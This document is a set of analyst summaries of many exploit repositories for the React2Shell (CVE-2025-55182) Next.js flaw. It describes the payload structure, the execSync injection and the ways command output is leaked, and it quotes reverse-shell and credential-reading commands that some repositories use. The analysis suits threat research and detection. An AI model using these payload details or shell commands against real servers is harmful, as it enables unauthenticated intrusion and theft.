React2Shell

This repository is a small standalone Ruby exploit tool named react2rubyshell (r2rs). It contains one substantive code file, r2rs.rb, plus a README, license, and gitignore. The script is not a framework module; it is a direct operator-facing exploit that targets a web-accessible vulnerable endpoint associated with CVE-2025-55182 / react2shell. The exploit’s core purpose is to turn a vulnerable HTTP endpoint into an interactive remote shell. The operator supplies a target host, hostname, or full URL, optionally with a port. The script normalizes the target, opens a persistent Net::HTTP connection, and repeatedly sends crafted multipart/form-data POST requests to the target URI. The malicious request body contains a JSON structure designed to abuse a server-side action flow: it injects JavaScript into a field named _prefix and uses process.mainModule.require('child_process').execSync(..., {shell:'/bin/sh', timeout:10000}) to run arbitrary shell commands on the remote host. Output handling is more than a simple one-shot PoC. For each command, the exploit generates a random marker, wraps the shell command so the marker appears before and after command output, and then parses the HTTP response for a "digest" field containing the exfiltrated result. This allows the tool to reliably extract command output from the server response. Before starting the interactive loop, it performs a validation step by echoing a random probe token and confirming that the token is returned. Once validated, the script provides an interactive Readline-based shell experience. It tracks remote context by querying user, hostname, current working directory, and HOME, then updates the prompt after each command. It also preserves a pseudo-session by prepending future commands with a cd into the last known remote working directory. This is not a true PTY, but it is an operational remote shell over HTTP suitable for arbitrary command execution and basic post-exploitation tasks. Repository structure is minimal: - README.md: usage, requirements, examples, and limitations. - r2rs.rb: full exploit implementation and CLI entry point. - LICENSE and .gitignore: ancillary files. Notable exploit characteristics: - Attack surface: web/network. - Transport: HTTP or HTTPS to an operator-specified target path. - Exploit primitive: server-side JavaScript injection leading to Node.js child_process command execution. - Result: interactive command execution with stdout/stderr capture and lightweight session context. - Limitations: no true PTY; TTY-sensitive programs may not work well. Overall, this is a real, functional exploit rather than a detector. It is best classified as OPERATIONAL because it delivers a working remote shell with a hardcoded exploitation method and interactive command loop, but it is not packaged as a larger reusable exploitation framework.

This repository is a small standalone Python exploit project centered on exploit.py, with a README and a minimal requirements.txt. The code is not part of a major exploitation framework. Its stated purpose is exploitation of CVE-2025-55182, described as a prototype-pollution-to-RCE issue affecting Next.js applications using React Server Components. The main capability implemented in the visible code is remote command execution over HTTP against a user-supplied target URL. The script accepts a target URL and either executes a single command (--cmd, default id) or launches a local browser-accessible interface (--web-cli). The local interface is served with Python's http.server/socketserver stack and presents a terminal-like HTML/JavaScript page. Commands entered in the browser are sent to a local endpoint (/run_cmd), which then invokes the exploit's core RCE routine against the remote target and returns the output for display. Based on the README and visible code/comments, the exploit works by sending a crafted payload to a vulnerable Next.js endpoint, abusing prototype pollution to influence internal server-side behavior and trigger Node.js child_process execution. Output is reportedly recovered from an error response field (digest). The exact remote vulnerable path and full request body are not visible in the provided truncated code, so no definitive remote application endpoint can be extracted from the snippet. Repository structure is simple: README.md documents usage and theory, exploit.py contains all exploit logic plus the local web UI server, and requirements.txt lists requests and dependencies. The exploit is operational rather than just a PoC because it includes usable command-execution functionality and an operator interface, but it does not appear weaponized or framework-integrated from the provided material.

This repository is a small standalone exploit repo containing one Python exploit script and a minimal README. The main file, CVE-2025-55182.py, is a command-line RCE exploit for CVE-2025-55182. It is not part of a larger exploitation framework. The exploit is structured around an ExploitConfig dataclass and an Exploit class. The class handles URL normalization, payload generation, vulnerability checking, command execution, interactive shell behavior, and batch scanning with threading. It uses requests for HTTP(S) communication, disables TLS warnings, rotates User-Agent strings, and supports configurable timeout, SSL verification disabling, and thread count. Core capability: the script builds a malicious JavaScript payload that is intended to execute on a vulnerable Node.js-backed web application. The payload calls child_process.execSync() with an operator-supplied command, captures stdout, base64-encodes it, and forces the application into a crafted NEXT_REDIRECT error/redirect flow. The encoded command output is embedded in a redirect to /login with query parameter a, which the exploit can recover and decode. This makes the exploit a true remote command execution tool rather than a detector. Operational modes visible in the script include: check-only mode using the test command 'id'; direct single-command execution; interactive shell mode; and batch scanning of targets from a file using a thread pool. The script prints status messages and can be used to validate vulnerability or repeatedly run arbitrary commands. Fingerprintable observables are limited because the target endpoint path appears to be dynamically crafted in truncated code, but the payload clearly references /login as the redirect sink for exfiltration. The exploit accepts arbitrary target base URLs over HTTP or HTTPS and defaults to HTTPS when no scheme is provided. No hardcoded IPs, domains, registry keys, or external C2 infrastructure are present. Overall, this is an operational standalone Python web exploit for unauthenticated or low-friction remote command execution against a vulnerable web application implementing the affected server-side JavaScript request handling path.

Repository contains a single Python 2.7 exploit script and a README. The main file, CVE-2025-55182.py, is a standalone exploit for CVE-2025-55182 targeting vulnerable Next.js applications. It supports two modes: (1) single-target interactive command execution and (2) multithreaded mass scanning from a file of targets. The exploit normalizes user input to HTTPS by default, appends /login when no path is provided, and sends a crafted multipart/form-data POST request with specially structured fields intended to trigger prototype pollution and constructor abuse in a Next.js server-side context. The injected JavaScript payload uses process.mainModule.require('child_process').execSync() to run arbitrary OS commands and then forces a redirect whose digest embeds the command output in /login?a=<output>. The script parses the x-action-redirect response header to determine success and recover output. Mass-scan mode uses a Queue with worker threads and writes successful results to a local file. Overall, this is a real exploit rather than a detector: its primary capability is unauthenticated remote command execution with basic output retrieval, packaged as an operator-friendly shell/scanner.

Small standalone PoC repository with two files: a README describing CVE-2025-55182 and affected React/Next.js versions, and a single Python exploit script. The exploit uses argparse to accept a target URL (-u) and arbitrary command (-c), then sends a multipart/form-data POST request with a crafted JSON structure intended to abuse React Server Components / Next.js server action processing. The malicious payload injects JavaScript into the server-side processing path, uses process.mainModule.require('child_process').execSync() to run the supplied command with a 5-second timeout, converts stdout to a string, and throws a manipulated NEXT_REDIRECT error containing the command output in the digest field. The script prints the HTTP status code and response body, allowing the operator to observe execution results. There is no scanning, brute force, persistence, or post-exploitation automation; it is a direct RCE proof-of-concept against a user-specified web endpoint.

This repository is a self-contained educational lab for CVE-2025-55182, demonstrating remote code execution against React Server Components/Next.js Server Actions via prototype pollution in Flight deserialization. The repo contains three main parts: (1) exploit/exploit.py, a Python exploit that crafts a malicious multipart/form-data Flight payload and POSTs it to the target root with Next-Action and X-Nextjs-Request-Id headers; (2) vulnerable/, a Next.js app using React 19.2.0 with a Server Action in app/actions.ts exposed through a form in app/page.tsx; and (3) patched/, a comparison app using React 19.2.1 without the vulnerable Server Action path. Docker Compose exposes the vulnerable app on port 3011 and the patched app on 3012. The exploit’s core capability is unauthenticated remote command execution. It builds a Flight object containing a reference chain to __proto__.then, causing Object.prototype.then pollution during deserialization. The injected JavaScript then executes process.mainModule.require('child_process').execSync(<command>) on the Node.js server. Output is base64-encoded and exfiltrated by throwing a crafted NEXT_REDIRECT error whose digest is reflected in the X-Action-Redirect response header. The script then parses that header and decodes the command output. Repository structure supports both exploitation and validation: README.md documents usage and expected behavior; docs/CVE-2025-55182.md explains the vulnerability, exploit chain, affected versions, and mitigations; vulnerable/ and patched/ provide reproducible targets. This is a real exploit PoC rather than a detector. It is operational but not heavily weaponized: the payload is customizable only through a supplied command argument, and the exploit logic is purpose-built for this specific vulnerability and lab setup.

This repository is a small standalone Python exploit PoC for CVE-2025-55182, with README documentation, one executable script, and a minimal requests dependency. The main file, cve-2025-55182.py, is the sole code artifact and acts as the entry point. It is not part of a larger exploit framework. The exploit targets vulnerable React Server Components / Next.js Server Actions deployments over HTTP(S). It builds a crafted multipart/form-data POST body that abuses the RSC wire protocol using a poisoned object with __proto__ pollution, constructor.constructor access, and a malicious _prefix JavaScript expression. The injected JavaScript executes synchronously on the server, uses Node.js child_process.execSync to run arbitrary OS commands, Base64-encodes stdout, and throws a forged NEXT_REDIRECT error so the application returns the output inside the x-action-redirect header. The script then parses either x-action-redirect or Location for the ?a= parameter, URL-decodes it, and Base64-decodes it for display. Capabilities include single-command execution (-c) and an interactive pseudo-shell (--shell), though the shell is stateless and sends one HTTP request per command. The operator can also override the Host header for virtual-hosted targets, set request timeouts, and enable verbose output to inspect raw response headers. There is no reverse shell, persistence, or callback infrastructure; exfiltration is entirely in-band via the HTTP response headers. Repository structure is simple: README.md provides vulnerability background, affected versions, usage examples, and references; requirements.txt lists requests>=2.28.0; .gitignore excludes Python artifacts and lab files. Overall, this is an operational but lightweight exploit script intended to demonstrate pre-authenticated RCE against vulnerable Node.js-based Next.js/React Server Components applications.

This repository is a small standalone Go exploit for CVE-2025-55182, described as React Server Components RCE via prototype pollution. It contains only two files: a README with usage examples and main.go implementing the exploit logic. The code is not a scanner or detector; it is an active exploitation tool that sends a crafted multipart/form-data POST request to a user-specified target URL. The exploit flow is straightforward: main() parses -t and -c arguments, normalizes the target URL (defaulting to HTTPS if no scheme is provided), prints status banners, and calls execute(). execute() builds a malicious multipart body in buildPayload(), sets Next.js-related headers in craftHeaders(), disables TLS verification, disables redirect following, and POSTs directly to the supplied target URL. The injected payload abuses a prototype-pollution-style object structure and embeds JavaScript that invokes process.mainModule.require('child_process').execSync('<command>') on the remote Node.js process. The command output is base64-encoded server-side and embedded into a forged NEXT_REDIRECT digest pointing to /login?a=<encoded>. parseResponse() then extracts the X-Action-Redirect header, regex-matches the /login?a= parameter, URL-decodes it, base64-decodes it if possible, and prints the recovered command output. Notable capabilities: arbitrary command execution, output retrieval, support for arbitrary operator-supplied commands, and practical post-exploitation use such as reading files or launching a reverse shell. The README explicitly demonstrates id, ls -la, cat /etc/passwd, and a busybox nc reverse shell. The exploit is operational rather than a bare PoC because it includes a complete request builder, response parser, CLI, and output handling, but it is still a simple standalone tool rather than a framework-integrated or highly modular weaponized exploit. Fingerprintable artifacts include the custom headers Next-Action, X-Nextjs-Request-Id, and X-Nextjs-Html-Request-Id; the multipart boundary string ----HacxMeBoundaryX9K2pLvN4MqR8TdF; the exfiltration path /login?a=...; and the expectation of an X-Action-Redirect response header. The code also uses a Firefox-like User-Agent string and sets InsecureSkipVerify=true for TLS. Overall, the repository’s purpose is to provide a command-line RCE exploit against a vulnerable Next.js/React Server Components target over HTTP(S).

This repository is a small standalone exploit project with two files: a README describing CVE-2025-55182 ('React2Shell') and a single Python entry point, exploit.py. The exploit targets vulnerable React Server Components / Next.js Server Actions by sending a crafted multipart/form-data POST request to the application root with a Next-Action header. The malicious Flight payload abuses insecure deserialization of a thenable object so that server-side JavaScript reaches child_process.execSync(), yielding unauthenticated pre-auth RCE. The Python script appears to implement three operator-facing modes described in the README: check, exec, and revshell. It uses requests for HTTP transport, supports optional proxying and randomized User-Agent selection, normalizes target URLs, and can auto-detect the operator IP address via tun0 or a UDP socket to 8.8.8.8. The payload builder constructs a multipart body with a fixed boundary and embeds JavaScript that executes an arbitrary shell command via process.mainModule.require('child_process').execSync(...). Output is transformed and exfiltrated by throwing a crafted NEXT_REDIRECT error so the server returns a 307 redirect with the result encoded in the X-Action-Redirect header. This makes the exploit more than a detector: it provides direct command execution and output retrieval. The repository also includes reverse shell support with multiple hardcoded templates: bash, python3, nc, mkfifo, and node. These payloads connect back to an operator-supplied host and port, defaulting to port 4444 and optionally auto-detecting the local host IP. Because the payloads are predefined but selectable and the exploit is a standalone script rather than a larger framework module, the maturity is best characterized as OPERATIONAL. Notable fingerprintable observables include POST requests to the target root path '/', the Next-Action request header, the X-Action-Redirect response header, and the redirect path '/login?a=...;307;' used for output exfiltration. The README contains example targets and proxies such as http://10.10.11.50 and http://127.0.0.1:8080. Overall, the repository's purpose is offensive exploitation of a web-exposed deserialization flaw in React/Next.js applications, enabling unauthenticated command execution and shell access.

This repository is a small proof-of-concept exploit package combining a benign-looking Next.js web app with a Python exploit script. The main exploit logic is in react-exp.py; the rest of the repository is largely a standard Next.js 16 application scaffold used as a local target/demo environment. The Python script accepts a base URL and optional command, builds a multipart/form-data POST request, and sends it to the target root path with a custom 'Next-Action' header. Its crafted JSON chunk abuses JavaScript prototype/constructor access patterns and injects a server-side JavaScript prefix that calls process.mainModule.require('child_process').execSync(...) to run an arbitrary shell command. The default command is 'id'. The payload then throws a NEXT_REDIRECT error object with the command output embedded in the digest field, allowing the operator to recover execution results from the HTTP response body. A commented alternate payload shows command execution without output capture. Repository structure: README.md contains usage steps; react-exp.py is the actual exploit; app/page.tsx, app/layout.tsx, globals.css, and config files form a simple branded Next.js site used for demonstration. No persistence, lateral movement, or secondary payload delivery is present. This is an operational RCE PoC rather than a detection script.

This repository is a small standalone Python proof-of-concept exploit for CVE-2025-55182, with README references also tying the issue to Next.js as CVE-2025-66478. The repository contains three files: a single exploit script (CVE-2025-55182.py), a README with usage/examples, and an MIT license. The Python script is the sole code file and main entry point. The exploit sends a crafted HTTP POST request using the requests library to an operator-supplied URL. It sets custom headers including Host: localhost, Next-Action: x, and a fixed multipart/form-data boundary. The POST body embeds a malicious serialized structure designed to trigger unsafe server-side behavior in React Server Components processing. The key execution primitive is injected into the _prefix field as JavaScript: process.mainModule.require('child_process').execSync('<command>');, which attempts to execute an arbitrary shell command on the target Node.js server. Capabilities are straightforward but dangerous: remote arbitrary command execution against a vulnerable server-side React/Next.js deployment. The script accepts a target URL and optional command-line command parameter; if omitted, it defaults to 'id'. It prints the target, command, and HTTP status code, but does not implement output retrieval, session handling, or advanced exploitation logic. Because it includes a usable hardcoded RCE primitive and supports arbitrary operator-supplied commands, it is more than a detection script but still a relatively simple PoC/operational exploit. No exploit framework is used. There is no persistence, privilege escalation, or lateral movement logic in the repository. The README includes an example reverse-shell command using netcat (nc 10.0.2.4 4444 -e sh), indicating intended post-exploitation use, but the exploit itself only delivers command execution and leaves payload selection to the operator.

Repository is a small standalone PoC/demo for CVE-2025-55182 ('React2Shell'). It contains both a vulnerable lab environment and a Python exploit. The vulnerable app is a minimal Next.js App Router project (`src/app/layout.js`, `src/app/page.js`) with dependencies pinned to Next.js 15.0.0 and React/react-server-dom-webpack 19.0.0 RC builds. `Dockerfile` builds and runs this app in a Node 20 Alpine container, exposing port 3000 and launching `next dev`. The main exploit logic is in `exploit.py`. It sends a single crafted `multipart/form-data` POST request to the target URL, defaulting to `http://localhost:3000`. The payload is a malicious React Flight object designed to abuse prototype traversal (`__proto__`) and constructor access (`constructor:constructor`) during deserialization. It injects JavaScript into the `_prefix` field that invokes `process.mainModule.require('child_process').execSync(...)`, yielding arbitrary command execution on the server. The default command creates `/tmp/success.txt`, but the script accepts a custom command and optional target URL via command-line arguments. Capabilities: unauthenticated web-based RCE against vulnerable React Server Components / Next.js targets; customizable command execution; basic response/status output for operator feedback. This is not a detection-only script and not obviously fake. It is best classified as an operational PoC: the payload is real and functional, but customization is limited to raw command strings rather than a full exploitation framework.

This repository is a controlled academic exploit lab for CVE-2025-55182 ('React2Shell'), modeling an unauthenticated RCE condition in React Server Components. It is not tied to a common exploit framework; instead it contains a standalone dual-profile lab with a vulnerable app, a patched app, Docker infrastructure, PowerShell automation, scenario testing, and extensive documentation/reporting. Core exploit logic resides in app/vulnerable/src/framework/entry.rsc.tsx. That handler clones incoming requests, parses POST JSON, extracts the __flight_action field, and passes it directly to node:child_process execSync with shell '/bin/sh'. This creates a network-reachable command-execution primitive over the .rsc endpoint. The response returns JSON containing the executed action and trimmed command output. Telemetry is written to logs/vulnerable-requests.log and suspicious requests are tagged with flight_action_injection. The patched counterpart in app/patched/src/framework/entry.rsc.tsx performs pre-deserialization validation: if a POST body contains __flight_action, it immediately returns HTTP 403 with JSON explaining the block and logs the event. It also blocks suspicious .rsc requests more generally with HTTP 400 based on probe query strings, unexpected methods, or JSON content types. The repository structure is clear and purposeful: app/vulnerable and app/patched each contain a minimal Vite/React RSC application; infra/ contains Dockerfiles and docker-compose exposing the vulnerable service on 3100 and patched service on 3200; scripts/ contains helper scripts including exploit-shell.ps1, which turns the RCE primitive into an interactive pseudo-shell by repeatedly POSTing __flight_action commands; tests/run-scenarios.mjs automates baseline, suspicious, and exploit scenarios and writes tests/results/scenario-report.json; docs/ and report/ document architecture, validation, telemetry, scenarios, and findings. Main exploit capabilities: unauthenticated remote command execution, command output retrieval, filesystem enumeration, environment disclosure, host/container reconnaissance, and interactive shell-like operation against the vulnerable lab target. The exploit is operational rather than heavily weaponized: payloads are simple shell commands, hardcoded transport is HTTP POST to /.rsc, and the included shell wrapper is interactive but basic.

Repository is a standalone proof-of-concept for CVE-2025-55182, centered on delivering crafted multipart/form-data requests to vulnerable Next.js server action/request parsing paths to achieve server-side code execution. The top-level POC directory contains the actual exploit artifacts: exploit.sh builds a multipart body in /tmp/exploit_payload.txt and POSTs it to http://localhost:3000/ with a hardcoded Next-Action ID; payload.http is a raw reproducible HTTP request targeting http://localhost:3001/; poc.py is the most flexible PoC, using Python requests to send the malicious multipart fields and demonstrating both local command execution and commented exfiltration options to https://a.m.pipedream.net; test-exploit.sh is a simpler curl-based tester against http://localhost:3000/api. The exploit primitive relies on malicious JSON fields such as then="$1:__proto__:then" and _formData.get="$1:constructor:constructor" combined with _response._prefix containing JavaScript that invokes process.mainModule.require('child_process').execSync(...). Demonstrated commands include whoami, ls -la, echo "pawned", and writing /tmp/rce-triggered.txt, indicating arbitrary command execution capability. The repository also includes two intentionally weak Next.js applications, weak-server and weak-server-2, used as local lab targets. Both expose a server action in app/actions.ts and a POST handler in app/api/route.ts that parses formData and logs headers/body. weak-server pins Next.js 16.0.6 with React 19.2.0, while weak-server-2 uses Next.js ^15.0.0 with React ^19.0.0. Overall, this is a real exploit PoC repository with bundled vulnerable test environments, not merely a detector or README.

This repository is a small standalone Python exploit for CVE-2025-55182, accompanied by a brief README. The main file, CVE-2025-55182.py, implements an interactive RCE client targeting a web application believed to be vulnerable through React Server Components / Next.js request handling. The script prompts for a target URL or IP, normalizes it to HTTP(S), derives the Host header, and sends a crafted multipart/form-data POST request directly to the target base URL. The exploit payload is embedded in the multipart body as JavaScript intended to execute on the server. It uses process.mainModule.require('child_process').execSync(...) to run arbitrary shell commands with a 5-second timeout, converts the output to a string, and exfiltrates the result by throwing a NEXT_REDIRECT error whose digest field contains command output. The script then parses the HTTP response body with regex to recover that digest and display it to the operator. Operationally, the tool behaves like a lightweight remote shell. It maintains a client-side notion of current working directory starting at /tmp and provides helper commands: cd updates the local path state, pwd prints it, ls runs 'ls -la' remotely, and cat reads remote files. Any other input is wrapped as 'cd <current_dir> && <user command>' and executed remotely. This makes the exploit more than a bare proof of concept: it is an operational interactive command-execution tool, though payload customization is manual and limited. Repository structure is minimal: one Python code file and one README. There is no framework integration, no detection-only logic, and no obvious destructive fake behavior. The exploit is clearly intended for direct operator-driven remote command execution against vulnerable React/Next.js deployments.

This repository is a multi-component security toolkit centered on CVE-2025-55182 ('React2Shell'), a claimed pre-auth React Flight / React Server Components deserialization RCE affecting React and Next.js. It is not just a detector: the `react2shell-scanner` component contains active exploitation logic exposed through `cli.py` and `exploit.py`, supporting safe-probe detection plus post-detection actions such as file read, directory listing, and arbitrary command execution against target web applications. The exploit path is web/network-based and appears to rely on crafted multipart/form-data POST requests with a `Next-Action` header to root or RSC-related endpoints, aiming to trigger digest errors or execute injected Node/JS primitives. Repository structure has three main tools: (1) `react2shell-scanner/` for GitHub org scanning, GCP infrastructure enumeration, and exploit testing; (2) `gcp-ioc-scanner/` for querying GCP Cloud Logging using IOC YAML definitions; and (3) `gcp-log-correlator/` for correlating suspicious trigger events with preceding HTTP requests on the same Kubernetes pod. There is also a deliberately vulnerable `react2shell-scanner/test-app/` Next.js fixture used to validate payloads and demonstrate exploitation behavior. Key code files include Python entry points (`react2shell-scanner/cli.py`, `react2shell-scanner/exploit.py`, `gcp-ioc-scanner/gcp-ioc-scanner`, `gcp-log-correlator/gcp-log-correlator`), shell wrappers (`react2shell-scanner/bin/scan-github`, `scan-gcp`, `scan-all`), and helper libraries (`lib/check-version.py`, `lib/scanner-common.sh`, `utils.py`). Languages present are primarily Python, shell/bash, JavaScript, YAML, and Docker configuration. Operationally, the GitHub scanner uses `gh api` to fetch `/repos/$ORGANIZATION/$repo/contents/package.json` and checks dependency versions against vulnerability definitions. The GCP scanner enumerates Artifact Registry, Cloud Run, and GKE resources using `gcloud`, but its vulnerability analysis is mostly inventory/pending-scan oriented rather than a full exploit. The IOC scanner builds Cloud Logging filters for namespaces/pod regexes and searches for patterns such as `E{"digest"`, prototype traversal strings, and suspicious POSTs to `/_next/data/` or `/api/.*Server`. The correlator then links suspicious error events to inbound HTTP requests by timestamp proximity. Overall, this is a real exploit-oriented toolkit with supporting exposure discovery and cloud log hunting capabilities, not merely a README or pure detection script. The exploit component is best classified as OPERATIONAL: it includes concrete payload-driven actions, but customization appears manual and outside a major exploitation framework.

This repository is a real exploit project centered on exploit/react2shell.py, a standalone Python exploit for CVE-2025-55182 affecting React Server Components in vulnerable React/Next.js deployments. The repository also includes extensive markdown analysis, a deliberately vulnerable Next.js lab application, an auxiliary curl-based exploit script, and a restoration script for resetting the lab after destructive testing. The main exploit is not merely a detector: it builds a malicious multipart/form-data request that targets Next.js Server Action / React Flight deserialization. The payload abuses prototype pollution ("$1:__proto__:then") and constructor traversal ("$1:constructor:constructor") to reach the JavaScript Function constructor, then executes attacker-controlled JavaScript in the Node.js process. That JavaScript invokes child_process.execSync() to run arbitrary shell commands. Command output is exfiltrated by throwing a NEXT_REDIRECT error whose digest is converted by Next.js into the X-Action-Redirect response header, typically embedding output in a /login?a=... redirect value. Capabilities described and partially visible in the code/docs include: vulnerability checking with a benign echo command, arbitrary command execution, interactive shell mode, environment-variable theft using a temp file and line-by-line reads to bypass header-size limits, website defacement, deletion of project/dashboard content, and server shutdown/DoS actions. This makes the exploit operational rather than a simple PoC. Repository structure: - exploit/react2shell.py: primary exploit implementation in Python using requests and argparse. - exploit/exploit-explanation.md: usage and architecture documentation. - docs/analysis/*.md: root-cause analysis, payload anatomy, and disclosure timeline. - vulnerable-app/: intentionally vulnerable Next.js 15.0.0 + React 19.0.0 demo target. - vulnerable-app/curl_id.sh: bash/curl variant of the exploit. - vulnerable-app/scripts/restore.sh: lab restoration helper. Fingerprintable observables include the target root path /, local demo URL http://localhost:3000, required headers Next-Action / X-Nextjs-Request-Id / X-Nextjs-Html-Request-Id, response header X-Action-Redirect, exfiltration redirect path /login?a=${res}, and temp file /tmp/stolen_env.txt. The vulnerable app itself exposes a server action in vulnerable-app/app/actions.ts and a client page in app/page.tsx, but the vulnerability is in the underlying React/Next.js deserialization path rather than in custom application logic.

This repository is a small standalone Python exploit toolkit consisting of one main code file (react2shell.py) and a README. It is not part of a major exploitation framework. The script is positioned as an exploitation suite for CVE-2025-55182 affecting Next.js applications and combines reconnaissance, scanning, exploitation, and post-exploitation style interaction. Repository structure: - README.md: Describes the claimed vulnerability, usage modes, features, and example workflows. - react2shell.py: Main executable Python script with CLI handling, subdomain enumeration logic, HTTP probing, and shell/exploitation workflow. Observed capabilities from the provided content: - Single-target mode via -u/--url. - Multi-target mode via -f/--file. - Domain reconnaissance mode via -d/--domain for subdomain enumeration followed by scanning/exploitation. - DNS-based subdomain resolution using dnspython when available. - HTTP/HTTPS probing of candidate subdomains using requests with TLS verification disabled. - Interactive shell abstraction through an EnhancedShell class referenced in main. - Claimed remote file operations (.upload, .download, .create) and output saving. - Claimed vulnerability scanning against common web paths associated with Next.js deployments. The exploit’s attack vector is web/network based. The README states the vulnerability is triggered through a malicious multipart/form-data request against a Next.js target, leading to arbitrary command execution by abusing Node.js child_process loading via process.mainModule.require('child_process'). Output is said to be base64-encoded and leaked through a redirect parameter (/login?a=). Although the full exploit implementation is truncated in the provided content, the script clearly goes beyond detection and is intended to obtain command execution and an operator shell. Notable endpoints and targets include generic HTTP/HTTPS target URLs, DNS-derived subdomains, scanner paths such as /, /api, /api/auth, /_next, /admin, and /dashboard, and the redirect exfiltration path /login?a=. The README also documents remote file paths used in examples, including /tmp/shell.php, /etc/passwd, /tmp/test.txt, and /tmp/backdoor.sh. Overall assessment: this is an operational standalone exploit tool rather than a simple PoC or detector. It appears designed to help an operator discover candidate Next.js hosts, test them, and if exploitation succeeds, interact with the compromised host through a command shell interface.

Repository is a small standalone Python proof-of-concept exploit with 3 files: one Python exploit script, a README, and an Apache 2.0 license. The main and only code file, CVE-2025-55182.py, implements a full exploit chain against a vulnerable React Server Components deployment over HTTP/HTTPS. Structure and behavior: - parse_base_url() normalizes the user-supplied target into scheme://host:port/path form, defaulting to http and port 80. - passive_scan() performs an initial GET to the base URL and looks for React Server Components indicators such as Content-Type text/x-component, window.__next_f, and react-server-dom-webpack strings. - fingerprint() performs an active GET with header RSC: 1 and checks for text/x-component responses, Vary: RSC, and body patterns matching the React Flight protocol. - build_payload() creates a malicious JSON object designed to abuse unsafe deserialization/prototype access and invoke Node.js child_process.execSync(command), base64-encoding command output. - build_payload_body() wraps that JSON into a multipart/form-data body with fields 0, 1, and 2. - exploit() POSTs the crafted body to a random UUID path under the target, using several Next.js-like headers. It then extracts a JSON error block from the response, reads the digest field, base64-decodes it, and prints the command output. - main() ties the workflow together: parse target, passive scan, active fingerprint, then exploit with a required --command argument. Capabilities: - Pre-authentication remote command execution against a vulnerable web application using React Server Components. - Basic target fingerprinting before exploitation. - Retrieval of command output from the HTTP response. - Supports arbitrary operator-supplied commands, including reverse shell one-liners shown in the README. Notable observations: - This is not merely a detector; it contains a working exploit path and payload generation logic. - The exploit is operational rather than heavily weaponized: it accepts arbitrary commands but does not include advanced session handling, staging, persistence, or automated target discovery. - README has an inconsistency in the title mentioning CVE-2026-33017 while the script and linked reference target CVE-2025-55182; the code itself clearly implements exploitation for the latter. - The exploit appears aimed at Node.js-backed React/Next.js-style environments where React Server Components request handling is exposed and vulnerable.

This repository is a small Node.js attacker panel that operationalizes an RCE exploit for CVE-2025-55182, described in the UI as a React Server Functions / React Flight Protocol prototype-pollution issue leading to access to the Function constructor and arbitrary code execution. The repo contains 4 files: a Dockerfile for containerized deployment, package.json defining Express, node-fetch, and form-data dependencies, a static frontend at public/index.html, and the main backend exploit logic in the file named 'server'. The frontend provides a simple web panel where an operator enters a target URL and an arbitrary shell command. It POSTs these values to the local /proxy endpoint. The backend then builds a crafted multipart/form-data request containing a malicious serialized object ('crafted_chunk') with __proto__ and constructor traversal primitives intended to trigger the vulnerable server-side React/Next.js behavior. The injected JavaScript payload uses process.mainModule.require('child_process').execSync(...) with a 5-second timeout to run the supplied command on the target. Output is embedded into a thrown NEXT_REDIRECT error's digest field, which the exploit then parses from the HTTP response and returns to the operator. The exploit is not merely a detector; it is an active RCE tool with a usable operator interface. It does not appear to be part of a major exploitation framework. The implementation is basic but functional: command input is escaped before insertion into the JavaScript payload, the target request uses the Next-Action header and multipart form data, and the server listens on port 8080 to expose the attacker panel. The Dockerfile suggests intended easy deployment as a standalone web-based exploitation service.

This repository is a Firefox browser extension named R2SAE (React2Shell Auto-Exploit) built to detect and exploit CVE-2025-55182, described as a prototype pollution issue in Next.js React Server Actions that can lead to remote code execution. It is not just documentation: the repository contains active exploit logic in JavaScript, a browser manifest, and a popup-based operator UI. Repository structure is small and focused: manifest.json defines the Firefox extension, permissions, background script, and browser action; background.js contains the core exploitation workflow, request/response interception, output capture, and bulk scan orchestration; popup.js implements the operator-facing logic for scanning, command execution, shell-like interaction, persistence, and export; popup.html and popup.css provide the interface; README.md documents usage and the claimed vulnerability. The main exploit capability is remote command execution against vulnerable Next.js targets. The extension builds crafted multipart/form-data payloads using a fixed WebKit-style boundary and sends POST requests intended for Next.js Server Actions. It modifies outbound headers for requests containing the Next-Action header, stripping and rewriting Origin/Host-related values to improve exploit delivery. It then listens for response headers and extracts encoded command output from the X-Action-Redirect header, specifically matching a /login?a=... pattern. The code includes a decoder that URL-decodes the captured value, replaces @ with newlines, and base64-decodes the result. Operational features include: single-target vulnerability testing using a harmless marker command (echo VULN_MARKER_12345), arbitrary command execution, pseudo-shell interaction, bulk scanning with resumable state stored in browser.storage.local, per-site UI state persistence, and export of results. The bulk scanner resolves URLs, executes the exploit sequentially, marks targets vulnerable when the marker is observed in decoded output, and records errors/server-down conditions. The exploit is best classified as OPERATIONAL rather than a simple POC because it contains working delivery, output capture, UI, persistence, and bulk-scanning logic, but it is not part of a larger exploitation framework. The attack surface is primarily web/network via a browser extension acting against arbitrary remote URLs.

This repository is a small standalone Python proof-of-concept exploit consisting of one executable script (CVE-2025-55182.py), a README, and a license file. It is not part of a larger exploitation framework. The Python script uses requests and argparse to target an HTTP/HTTPS application believed to expose vulnerable React Server Components / Next.js-style server functionality. The exploit workflow has three stages: (1) passive scanning of the base URL for indicators such as Content-Type text/x-component, window.__next_f, and react-server-dom-webpack; (2) active fingerprinting by sending the RSC: 1 header and checking for text/x-component, Vary: RSC, and React Flight protocol-like response bodies; and (3) exploitation by POSTing a crafted multipart/form-data body to a random UUID path under the target base URL. The malicious payload is a serialized object designed to reach JavaScript constructor/prototype paths and ultimately execute Node.js code on the server. Specifically, it invokes process.mainModule.require('child_process').execSync('<command>'), base64-encodes stdout, and throws an error object whose digest field carries the encoded output back in the HTTP response. The Python client extracts that digest, decodes it, and prints the command output. Because the command is operator-controlled via --command, the exploit supports arbitrary command execution, including reverse shells as shown in the README example. Notable implementation details: the target path is randomized with a UUID; the exploit uses several Next.js-like headers (Next-Action, X-Nextjs-Request-Id, X-Nextjs-Html-Request-Id); and the multipart body contains three form fields with the serialized payload and references. The README appears to contain a typo in the title (CVE-2026-33017) while both the script name and linked advisory reference CVE-2025-55182. Overall, this is a real exploit PoC for pre-authentication web-based RCE against vulnerable React Server Components deployments, with basic but functional payload handling.

